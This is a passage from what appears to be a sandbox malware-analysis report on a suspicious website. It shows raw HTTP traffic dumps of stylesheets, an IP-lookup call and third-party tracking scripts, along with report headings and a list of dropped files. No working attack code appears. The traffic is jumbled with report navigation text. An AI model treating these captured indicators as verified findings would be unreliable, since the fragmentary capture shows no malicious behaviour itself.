.commentBtn.showParents{background-color:#101010;bord
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 23 66 66 66 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 2e 35 65 6d 20 2e 35 65 6d 20 2e 35 65 6d 20 31 65 6d 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 77 69 64 74 68 3a 31 30 30 25 7d 20 20 23 63 6d 74 57 72 61 70 70 65 72 20 2e 63 6d 74 44 72 6f 70 44 6f 77 6e 3e 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 35 35 35 7d 20 20 23 63 6d 74 57 72 61 70 70 65 72 20 2e 63 6d 74 44 72 6f 70 44 6f 77 6e 3e 62 75 74 74 6f 6e 20 73 70 61 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 20 20 23 63 6d 74 57 72 61 70 70 65 72 20 2e 63 6d 74 44 72 6f 70 44 6f 77 6e 3e 62 75 74 74 6f 6e 3a 61 66 74 65 72 7b 63 6f 6e Data Ascii: #fff;cursor:pointer;padding:.5em .5em .5em 1em;text-align:left;width:100%} #cmtWrapper .cmtDropDown>button{border:1px solid #555} #cmtWrapper .cmtDropDown>button span{display:inline-block;vertical-align:middle} #cmtWrapper .cmtDropDown>button:after{con
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 3a 34 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 20 20 23 63 6d 74 57 72 61 70 70 65 72 20 2e 76 6f 74 65 54 6f 74 61 6c 7b 63 6f 6c 6f 72 3a 23 38 66 61 66 31 64 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 32 35 65 6d 7d 20 20 23 63 6d 74 43 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 65 6d 7d 20 20 23 63 6d 74 43 6f 6e 74 65 6e 74 20 2e 62 6f 78 55 73 65 72 43 6f 6d 6d 65 6e 74 73 7b 77 69 64 74 68 3a 36 30 70 78 3b 68 65 69 67 68 74 3a 36 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 65 6d 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 20 20 23 63 6d 74 43 6f 6e 74 65 6e 74 20 2e 62 6f 78 55 73 65 72 43 6f 6d 6d 65 6e 74 73 20 61 7b 64 69 73 Data Ascii: :40px;overflow:auto} #cmtWrapper .voteTotal{color:#8faf1d;display:block;padding-top:.25em} #cmtContent{padding:0 1em} #cmtContent .boxUserComments{width:60px;height:60px;float:left;margin-right:1em;position:relative} #cmtContent .boxUserComments a{dis
2025-10-17 06:51:40 UTC	776	IN	Data Raw: 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 35 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 20 20 23 63 6d 74 43 6f 6e 74 65 6e 74 20 2e 63 6f 6d 6d 65 6e 74 42 6c 6f 63 6b 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 65 6d 7d 20 20 23 63 6d 74 43 6f 6e 74 65 6e 74 20 2e 63 6f 6d 6d 65 6e 74 42 6c 6f 63 6b 20 61 2e 75 73 65 72 6e 61 6d 65 4c 69 6e 6b 3e 73 70 61 6e 2e 66 6c 61 67 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 7d 20 20 23 63 6d 74 43 6f 6e 74 65 6e 74 20 2e 63 6f 6d 6d 65 6e 74 42 6c 6f 63 6b 3a 68 6f 76 65 72 20 2e 62 75 74 74 6f 6e 42 6c 6f 63 6b 52 69 67 68 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 20 20 23 63 6d 74 43 6f 6e 74 65 6e 74 20 2e 61 6c 6c 43 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 42 6c 6f 63 6b 7b 6d 61 72 Data Ascii: left;padding-top:.5em;width:100%} #cmtContent .commentBlock{margin-top:2em} #cmtContent .commentBlock a.usernameLink>span.flag{margin-left:5px} #cmtContent .commentBlock:hover .buttonBlockRight{display:block} #cmtContent .allComments .commentBlock{mar
2025-10-17 06:51:40 UTC	573	OUT	GET /css/w10-bootstrap.min.css HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://xpoalswwkjddsljsy.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:40 UTC	311	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:40 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:19 GMT ETag: "32d89-64041ed5f5d8f" Accept-Ranges: bytes Content-Length: 208265 Vary: Accept-Encoding Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/css
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 20 76 35 2e 32 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 32 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 32 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 2e 77 31 30 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d Data Ascii: @charset "UTF-8";/! Bootstrap v5.2.0 (https://getbootstrap.com/) * Copyright 2011-2022 The Bootstrap Authors * Copyright 2011-2022 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */.w10{--bs-blue:#0d6efd;-
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 20 4e 65 77 22 2c 6d 6f 6e 6f 73 70 61 63 65 3b 2d 2d 62 73 2d 67 72 61 64 69 65 6e 74 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 38 30 64 65 67 2c 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 31 35 29 2c 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 29 29 3b 2d 2d 62 73 2d 62 6f 64 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 62 73 2d 66 6f 6e 74 2d 73 61 6e 73 2d 73 65 72 69 66 29 3b 2d 2d 62 73 2d 62 6f 64 79 2d 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 2d 2d 62 73 2d 62 6f 64 79 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 2d 62 73 2d 62 6f 64 79 2d 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 2d 2d 62 73 2d 62 6f 64 79 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 2d Data Ascii: New",monospace;--bs-gradient:linear-gradient(180deg, rgba(255, 255, 255, 0.15), rgba(255, 255, 255, 0));--bs-body-font-family:var(--bs-font-sans-serif);--bs-body-font-size:1rem;--bs-body-font-weight:400;--bs-body-line-height:1.5;--bs-body-color:#212529;-
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 35 72 65 6d 20 2b 20 2e 39 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 77 31 30 20 2e 68 32 2c 2e 77 31 30 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 7d 2e 77 31 30 20 2e 68 33 2c 2e 77 31 30 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 72 65 6d 20 2b 20 2e 36 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 77 31 30 20 2e 68 33 2c 2e 77 31 30 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 7d 2e 77 31 30 20 2e 68 34 2c 2e 77 31 30 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 32 37 35 72 65 6d 20 2b 20 2e 33 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 Data Ascii: 5rem + .9vw)}@media (min-width:1200px){.w10 .h2,.w10 h2{font-size:2rem}}.w10 .h3,.w10 h3{font-size:calc(1.3rem + .6vw)}@media (min-width:1200px){.w10 .h3,.w10 h3{font-size:1.75rem}}.w10 .h4,.w10 h4{font-size:calc(1.275rem + .3vw)}@media (min-width:1200px)
2025-10-17 06:51:40 UTC	1460	IN	Data Raw: 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 77 31 30 20 70 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 2e 77 31 30 20 70 72 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 2e 77 31 30 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 73 2d 63 6f 64 65 2d 63 6f 6c 6f 72 29 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 2e 77 31 30 20 63 6f 64 65 7b 63 6f 6c 6f 72 Data Ascii: ont-size:1em}.w10 pre{display:block;margin-top:0;margin-bottom:1rem;overflow:auto;font-size:.875em}.w10 pre code{font-size:inherit;color:inherit;word-break:normal}.w10 code{font-size:.875em;color:var(--bs-code-color);word-wrap:break-word}a>.w10 code{color
2025-10-17 06:51:41 UTC	566	OUT	GET /css/large_temp.css HTTP/1.1 Host: xpoalswwkjddsljsy.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://xpoalswwkjddsljsy.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:41 UTC	309	IN	HTTP/1.1 200 OK Date: Fri, 17 Oct 2025 06:51:41 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 03 Oct 2025 14:29:19 GMT ETag: "8353-64041ed548046" Accept-Ranges: bytes Content-Length: 33619 Vary: Accept-Encoding Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/css

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:41 UTC	624	OUT	GET /pingjs/?k=3ck54buj9z&t=CloudFlare&c=c&x=https%3A%2F%2Fxpoalswwkjddsljsy.com%2F&y=&a=0&d=1.81&v=27&r=6351 HTTP/1.1 host: whos.amung.us sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: script sec-fetch-storage-access: active referer: https://xpoalswwkjddsljsy.com/ accept-encoding: identity accept-language: en-US,en;q=0.9
2025-10-17 06:51:41 UTC	263	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:41 GMT content-type: text/javascript;charset=UTF-8 x-wau: web2 vary: accept-encoding cf-cache-status: DYNAMIC server: cloudflare cf-ray: 98fdde70f92f70cb-ZRH alt-svc: h3=":443"; ma=86400 content-length: 30
2025-10-17 06:51:41 UTC	30	IN	Data Raw: 57 41 55 5f 72 5f 63 28 27 34 37 36 27 2c 27 33 63 6b 35 34 62 75 6a 39 7a 27 2c 30 29 3b Data Ascii: WAU_r_c('476','3ck54buj9z',0);
2025-10-17 06:51:41 UTC	622	OUT	GET /pingjs/?k=3wcfa1cqds&t=CloudFlare&c=c&x=https%3A%2F%2Fxpoalswwkjddsljsy.com%2F&y=&a=1&d=1.81&v=27&r=20 HTTP/1.1 host: whos.amung.us sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: script sec-fetch-storage-access: active referer: https://xpoalswwkjddsljsy.com/ accept-encoding: identity accept-language: en-US,en;q=0.9
2025-10-17 06:51:41 UTC	263	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:41 GMT content-type: text/javascript;charset=UTF-8 x-wau: web2 vary: accept-encoding cf-cache-status: DYNAMIC server: cloudflare cf-ray: 98fdde70f93170cb-ZRH alt-svc: h3=":443"; ma=86400 content-length: 29
2025-10-17 06:51:41 UTC	29	IN	Data Raw: 57 41 55 5f 72 5f 63 28 27 31 38 27 2c 27 33 77 63 66 61 31 63 71 64 73 27 2c 31 29 3b Data Ascii: WAU_r_c('18','3wcfa1cqds',1);

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:41 UTC	551	OUT	GET /?format=json HTTP/1.1 host: api.ipify.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / origin: https://xpoalswwkjddsljsy.com sec-fetch-site: cross-site sec-fetch-mode: cors sec-fetch-dest: empty referer: https://xpoalswwkjddsljsy.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=1, i
2025-10-17 06:51:41 UTC	230	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:41 GMT content-type: application/json content-length: 23 server: cloudflare access-control-allow-origin: * vary: Origin cf-cache-status: DYNAMIC cf-ray: 98fdde7109b403af-ZRH
2025-10-17 06:51:41 UTC	23	IN	Data Raw: 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 39 31 22 7d Data Ascii: {"ip":"102.129.143.91"}

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:41 UTC	566	OUT	GET /i/?l=https%3A%2F%2Fxpoalswwkjddsljsy.com%2F&j= HTTP/1.1 host: t.dtscout.com sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: script sec-fetch-storage-access: active referer: https://xpoalswwkjddsljsy.com/ accept-encoding: identity accept-language: en-US,en;q=0.9
2025-10-17 06:51:41 UTC	707	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:41 GMT content-type: application/javascript server: cloudflare nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} x-s: mtl3 x-t: 0.377 expires: Fri, 17 Oct 2025 06:51:40 GMT cache-control: no-cache cf-cache-status: DYNAMIC report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=qUFkAXYupYdE%2BDZPBknA3Zq5PlierYOKjFyRvaa982sTNIijMFCoABdUT26Q61qtZMX8osLzbKiXd1qj33DuuF1JwGCNFJpnXsBbWA%3D%3D"}]} set-cookie: df=1760683901; SameSite=None; Secure; Path=/; Domain=dtscout.com; Max-Age=8640000; Expires=Sun, 25 Jan 2026 06:51:41 GMT cf-ray: 98fdde710d6903a3-ZRH content-length: 2079
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 2e 65 78 65 63 29 7b 74 2e 65 78 65 63 3d 21 30 3b 76 61 72 20 72 3d 21 21 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 2c 63 3d 6c 28 29 2c 61 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 72 65 70 6c 61 63 65 28 22 77 77 77 2e 22 2c 22 22 29 2c 65 3d 22 5f 64 74 73 70 76 22 2c 69 3d 22 68 74 74 70 73 3a 2f 2f 74 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 70 76 2f 22 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 7c 7c 76 6f 69 64 20 30 21 3d 3d 28 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d Data Ascii: !function(t){if(!t.exec){t.exec=!0;var r=!!navigator.sendBeacon,c=l(),a=window.location.hostname.replace("www.",""),e="_dtspv",i="https://t.dtscout.com/pv/",o=document.getElementsByTagName("head")[0];if(void 0!==o\|\|void 0!==(o=document.getElementsByTagNam
2025-10-17 06:51:41 UTC	619	IN	Data Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 2e 73 72 63 3d 69 2b 22 3f 22 2b 67 28 65 2c 22 73 74 72 69 6e 67 22 29 7d 7d 63 61 74 63 68 28 74 29 7b 7d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 74 29 7b 72 65 74 75 72 6e 28 31 65 33 32 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 74 6f 53 74 72 69 6e 67 28 33 36 29 2e 73 75 62 73 74 72 28 30 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2f 31 65 33 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 29 7b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 70 61 72 73 65 28 6e 2e 67 65 74 49 74 65 6d 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 29 7b 6e 2e 73 65 74 49 74 65 6d 28 65 2c 4a 53 4f 4e 2e 73 74 Data Ascii: ocument.createElement("img").src=i+"?"+g(e,"string")}}catch(t){}}}}function p(t){return(1e32*Math.random()).toString(36).substr(0,t)}function l(){return(new Date).getTime()/1e3}function m(){return JSON.parse(n.getItem(e))}function f(t){n.setItem(e,JSON.st
2025-10-17 06:51:42 UTC	652	OUT	GET /pv/?_a=v&_h=xpoalswwkjddsljsy.com&_ss=65j4jc1qr0&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=1yoy&_cb=_dtspv.c HTTP/1.1 host: t.dtscout.com sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: script sec-fetch-storage-access: active referer: https://xpoalswwkjddsljsy.com/ accept-encoding: identity accept-language: en-US,en;q=0.9 cookie: df=1760683901
2025-10-17 06:51:42 UTC	574	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:42 GMT content-type: application/javascript server: cloudflare nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} x-t: 0.135 x-c: 0 expires: Fri, 17 Oct 2025 06:51:41 GMT cache-control: no-cache cf-cache-status: DYNAMIC report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=QylsxFDE%2BTmQ9ekozBn7xJTiIQqHBUAtr%2FNnsqbTVYfJRdFKP4DJddlb71Fy4Sn7%2B1%2Fktzqwq3tgSskTsARahtS3uISYNc4S4X514g%3D%3D"}]} cf-ray: 98fdde72ba0d03a3-ZRH content-length: 51
2025-10-17 06:51:42 UTC	51	IN	Data Raw: 74 72 79 7b 5f 64 74 73 70 76 2e 63 28 7b 22 62 22 3a 22 63 68 72 6f 6d 65 40 31 33 34 22 7d 2c 27 31 79 6f 79 27 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d Data Ascii: try{_dtspv.c({"b":"chrome@134"},'1yoy');}catch(e){}

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://thefatshallot.com/

Overview

General Information

Detection

Signatures

Classification

Process Tree

AI Summary

Source: https://thefatshallot.com/

Source: Malware

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ODUD3N93\rtdx[1].dat

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3pgm15a.hdq.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wi1f4tcl.qnv.psm1

Chrome Cache Entry: 145

Chrome Cache Entry: 146

Chrome Cache Entry: 147

Chrome Cache Entry: 148

Chrome Cache Entry: 149

Chrome Cache Entry: 150

Chrome Cache Entry: 151

Chrome Cache Entry: 152

Chrome Cache Entry: 153

Chrome Cache Entry: 154

Chrome Cache Entry: 155

Chrome Cache Entry: 156

Chrome Cache Entry: 157

Windows Analysis Report
https://thefatshallot.com/

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:41 UTC	524	OUT	GET /tc.js HTTP/1.1 host: cdn.tynt.com sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 accept: / sec-fetch-site: cross-site sec-fetch-mode: no-cors sec-fetch-dest: script sec-fetch-storage-access: active referer: https://xpoalswwkjddsljsy.com/ accept-encoding: identity accept-language: en-US,en;q=0.9
2025-10-17 06:51:41 UTC	375	IN	HTTP/1.1 200 OK date: Fri, 17 Oct 2025 06:51:41 GMT content-type: application/javascript cf-ray: 98fdde7268e9b571-ZRH last-modified: Mon, 03 Mar 2025 20:07:20 GMT vary: Accept-Encoding etag: W/"67c60bf8-3a58" age: 145948 expires: Mon, 20 Oct 2025 06:51:41 GMT cache-control: public, max-age=259200 cf-cache-status: HIT server: cloudflare content-length: 14936
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 2f 2f 76 31 38 36 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 38 2d 32 30 32 35 20 33 33 41 63 72 6f 73 73 20 49 6e 63 2e 20 41 6c 6c 20 52 69 67 68 74 73 20 52 65 73 65 72 76 65 64 0a 0a 54 79 6e 74 3d 77 69 6e 64 6f 77 2e 54 79 6e 74 7c 7c 5b 5d 3b 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 54 79 6e 74 2e 54 49 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 54 79 6e 74 2e 54 43 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 54 79 6e 74 2e 54 49 43 46 4c 26 26 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2c 6b 3d 64 6f 63 75 6d 65 6e 74 2c 68 3d 7b 64 69 73 74 72 6f 3a 22 54 43 22 2c 69 64 3a 22 54 43 2d 22 2b 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 Data Ascii: //v186 Copyright (c) 2008-2025 33Across Inc. All Rights ReservedTynt=window.Tynt\|\|[];"undefined"==typeof Tynt.TIL&&"undefined"==typeof Tynt.TCL&&"undefined"==typeof Tynt.TICFL&&function(){var e=window,k=document,h={distro:"TC",id:"TC-"+(new Date).getTi
2025-10-17 06:51:41 UTC	1460	IN	Data Raw: 7b 61 73 79 6e 63 3a 22 61 73 79 6e 63 22 2c 72 65 66 65 72 72 65 72 50 6f 6c 69 63 79 3a 22 75 6e 73 61 66 65 2d 75 72 6c 22 2c 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 2c 73 72 63 3a 61 7d 2c 6e 75 6c 6c 2c 62 29 3b 74 68 69 73 2e 69 6e 73 65 72 74 45 6c 65 28 61 2c 63 7c 7c 62 2e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 29 7d 2c 69 6e 6a 65 63 74 53 69 63 53 63 72 69 70 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 69 6e 6a 65 63 74 53 63 72 69 70 74 28 74 68 69 73 2e 5f 73 69 63 55 72 6c 2c 0a 77 69 6e 64 6f 77 2c 61 29 7d 2c 69 6e 6a 65 63 74 41 70 6f 6c 6c 6f 53 63 72 69 70 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 69 Data Ascii: {async:"async",referrerPolicy:"unsafe-url",type:"text/javascript",src:a},null,b);this.insertEle(a,c\|\|b.document.getElementsByTagName("script")[0])},injectSicScript:function(a){this.injectScript(this._sicUrl,window,a)},injectApolloScript:function(){this.i
